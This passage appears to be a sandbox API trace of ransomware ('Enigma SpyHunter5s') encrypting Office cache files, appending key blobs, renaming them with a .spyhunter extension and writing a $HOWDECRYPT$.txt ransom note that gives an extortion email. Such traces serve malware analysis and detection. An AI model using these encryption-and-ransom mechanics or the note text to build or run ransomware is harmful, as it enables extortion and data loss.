lpNumberOfBytesRead=0x270feb4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x270feb4*=0x391, lpOverlapped=0x0) returned 1 [0083.565] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffffc6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.565] WriteFile (in: hFile=0xcc, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x270feb4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x270feb4*=0x391, lpOverlapped=0x0) returned 1 [0083.565] GetProcessHeap () returned 0x2c0000 [0083.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0083.565] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.565] WriteFile (in: hFile=0xcc, lpBuffer=0x270fef4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270feb4, lpOverlapped=0x0 | out: lpBuffer=0x270fef4*, lpNumberOfBytesWritten=0x270feb4*=0x4, lpOverlapped=0x0) returned 1 [0083.566] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270feb4, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270feb4*=0x30, lpOverlapped=0x0) returned 1 [0083.566] CloseHandle (hObject=0xcc) returned 1 [0083.566] GetProcessHeap () returned 0x2c0000 [0083.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.566] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.spyhunter") returned 90 [0083.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.spyhunter")) returned 1 [0083.567] GetProcessHeap () returned 0x2c0000 [0083.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0083.567] GetProcessHeap () returned 0x2c0000 [0083.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0083.567] GetProcessHeap () returned 0x2c0000 [0083.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327dd8 | out: hHeap=0x2c0000) returned 1 [0083.567] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0083.567] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0083.567] WriteFile (in: hFile=0xcc, lpBuffer=0x270fe2b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ff54, lpOverlapped=0x0 | out: lpBuffer=0x270fe2b*, lpNumberOfBytesWritten=0x270ff54*=0x127, lpOverlapped=0x0) returned 1 [0083.568] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0083.568] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ff54, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ff54*=0x2ac, lpOverlapped=0x0) returned 1 [0083.569] CloseHandle (hObject=0xcc) returned 1 [0083.569] GetProcessHeap () returned 0x2c0000 [0083.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328468 | out: hHeap=0x2c0000) returned 1 [0083.569] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fef0 | out: pbBuffer=0x270fef0) returned 1 [0083.569] GetProcessHeap () returned 0x2c0000 [0083.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0083.569] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fee8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fee8*=0x30) returned 1 [0083.569] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0083.570] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0083.570] StrStrW (lpFirst="ShellUI.MST", lpSrch=".txt") returned 0x0 [0083.570] GetProcessHeap () returned 0x2c0000 [0083.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0083.570] ReadFile (in: hFile=0xcc, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270feac, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x270feac*=0xe00, lpOverlapped=0x0) returned 1 [0083.582] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffff200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.582] WriteFile (in: hFile=0xcc, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x270feac, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x270feac*=0xe00, lpOverlapped=0x0) returned 1 [0083.582] GetProcessHeap () returned 0x2c0000 [0083.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0083.582] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.582] WriteFile (in: hFile=0xcc, lpBuffer=0x270feec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270feac, lpOverlapped=0x0 | out: lpBuffer=0x270feec*, lpNumberOfBytesWritten=0x270feac*=0x4, lpOverlapped=0x0) returned 1 [0083.583] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270feac, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270feac*=0x30, lpOverlapped=0x0) returned 1 [0083.583] CloseHandle (hObject=0xcc) returned 1 [0083.583] GetProcessHeap () returned 0x2c0000 [0083.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.583] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.spyhunter") returned 88 [0083.584] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.spyhunter")) returned 1 [0083.584] GetProcessHeap () returned 0x2c0000 [0083.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0083.584] GetProcessHeap () returned 0x2c0000 [0083.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0083.584] GetProcessHeap () returned 0x2c0000 [0083.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326f10 | out: hHeap=0x2c0000) returned 1 [0083.584] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fef0 | out: pbBuffer=0x270fef0) returned 1 [0083.584] GetProcessHeap () returned 0x2c0000 [0083.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0083.584] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fee8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fee8*=0x30) returned 1 [0083.584] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0083.585] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0083.585] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0083.585] GetProcessHeap () returned 0x2c0000 [0083.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0083.585] ReadFile (in: hFile=0xcc, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270feac, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x270feac*=0x2488, lpOverlapped=0x0) returned 1 [0083.645] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffdb78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.645] WriteFile (in: hFile=0xcc, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x2488, lpNumberOfBytesWritten=0x270feac, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x270feac*=0x2488, lpOverlapped=0x0) returned 1 [0083.645] GetProcessHeap () returned 0x2c0000 [0083.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0083.645] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.645] WriteFile (in: hFile=0xcc, lpBuffer=0x270feec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270feac, lpOverlapped=0x0 | out: lpBuffer=0x270feec*, lpNumberOfBytesWritten=0x270feac*=0x4, lpOverlapped=0x0) returned 1 [0083.646] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270feac, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270feac*=0x30, lpOverlapped=0x0) returned 1 [0083.646] CloseHandle (hObject=0xcc) returned 1 [0083.646] GetProcessHeap () returned 0x2c0000 [0083.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.647] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter") returned 86 [0083.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.spyhunter")) returned 1 [0083.647] GetProcessHeap () returned 0x2c0000 [0083.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0083.647] GetProcessHeap () returned 0x2c0000 [0083.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0083.647] GetProcessHeap () returned 0x2c0000 [0083.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326e28 | out: hHeap=0x2c0000) returned 1 [0083.647] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fee8 | out: pbBuffer=0x270fee8) returned 1 [0083.647] GetProcessHeap () returned 0x2c0000 [0083.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0083.647] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fee0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fee0*=0x30) returned 1 [0083.648] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0083.650] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0083.650] StrStrW (lpFirst="setup.chm", lpSrch=".txt") returned 0x0 [0083.650] GetProcessHeap () returned 0x2c0000 [0083.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0083.650] ReadFile (in: hFile=0xcc, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fea4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x270fea4*=0x2800, lpOverlapped=0x0) returned 1 [0083.695] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.695] WriteFile (in: hFile=0xcc, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fea4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x270fea4*=0x2800, lpOverlapped=0x0) returned 1 [0083.696] GetProcessHeap () returned 0x2c0000 [0083.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0083.696] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.696] WriteFile (in: hFile=0xcc, lpBuffer=0x270fee4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fea4, lpOverlapped=0x0 | out: lpBuffer=0x270fee4*, lpNumberOfBytesWritten=0x270fea4*=0x4, lpOverlapped=0x0) returned 1 [0083.704] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fea4, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fea4*=0x30, lpOverlapped=0x0) returned 1 [0083.705] CloseHandle (hObject=0xcc) returned 1 [0083.706] GetProcessHeap () returned 0x2c0000 [0083.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.707] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.spyhunter") returned 86 [0083.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.spyhunter")) returned 1 [0083.710] GetProcessHeap () returned 0x2c0000 [0083.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0083.710] GetProcessHeap () returned 0x2c0000 [0083.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0083.710] GetProcessHeap () returned 0x2c0000 [0083.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326d40 | out: hHeap=0x2c0000) returned 1 [0083.710] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fee8 | out: pbBuffer=0x270fee8) returned 1 [0083.710] GetProcessHeap () returned 0x2c0000 [0083.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0083.710] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fee0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fee0*=0x30) returned 1 [0083.710] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0083.710] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0083.710] StrStrW (lpFirst="OfficeMUISet.xml", lpSrch=".txt") returned 0x0 [0083.710] GetProcessHeap () returned 0x2c0000 [0083.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0083.711] ReadFile (in: hFile=0xcc, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fea4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x270fea4*=0x333, lpOverlapped=0x0) returned 1 [0083.725] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.725] WriteFile (in: hFile=0xcc, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x270fea4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x270fea4*=0x333, lpOverlapped=0x0) returned 1 [0083.725] GetProcessHeap () returned 0x2c0000 [0083.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0083.725] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.725] WriteFile (in: hFile=0xcc, lpBuffer=0x270fee4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fea4, lpOverlapped=0x0 | out: lpBuffer=0x270fee4*, lpNumberOfBytesWritten=0x270fea4*=0x4, lpOverlapped=0x0) returned 1 [0083.725] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fea4, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fea4*=0x30, lpOverlapped=0x0) returned 1 [0083.725] CloseHandle (hObject=0xcc) returned 1 [0083.726] GetProcessHeap () returned 0x2c0000 [0083.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.726] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.spyhunter") returned 93 [0083.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.spyhunter")) returned 1 [0083.727] GetProcessHeap () returned 0x2c0000 [0083.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0083.727] GetProcessHeap () returned 0x2c0000 [0083.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0083.727] GetProcessHeap () returned 0x2c0000 [0083.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328378 | out: hHeap=0x2c0000) returned 1 [0083.727] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fee0 | out: pbBuffer=0x270fee0) returned 1 [0083.727] GetProcessHeap () returned 0x2c0000 [0083.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0083.727] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fed8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fed8*=0x30) returned 1 [0083.727] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0083.729] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0083.729] StrStrW (lpFirst="OfficeMUI.xml", lpSrch=".txt") returned 0x0 [0083.729] GetProcessHeap () returned 0x2c0000 [0083.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0083.729] ReadFile (in: hFile=0xcc, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fe9c, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x270fe9c*=0x15b5, lpOverlapped=0x0) returned 1 [0083.786] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffea4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.786] WriteFile (in: hFile=0xcc, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x270fe9c, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x270fe9c*=0x15b5, lpOverlapped=0x0) returned 1 [0083.787] GetProcessHeap () returned 0x2c0000 [0083.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0083.787] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.787] WriteFile (in: hFile=0xcc, lpBuffer=0x270fedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fe9c, lpOverlapped=0x0 | out: lpBuffer=0x270fedc*, lpNumberOfBytesWritten=0x270fe9c*=0x4, lpOverlapped=0x0) returned 1 [0083.787] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fe9c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fe9c*=0x30, lpOverlapped=0x0) returned 1 [0083.787] CloseHandle (hObject=0xcc) returned 1 [0083.787] GetProcessHeap () returned 0x2c0000 [0083.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.788] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.spyhunter") returned 90 [0083.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.spyhunter")) returned 1 [0083.789] GetProcessHeap () returned 0x2c0000 [0083.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0083.789] GetProcessHeap () returned 0x2c0000 [0083.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0083.789] GetProcessHeap () returned 0x2c0000 [0083.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328198 | 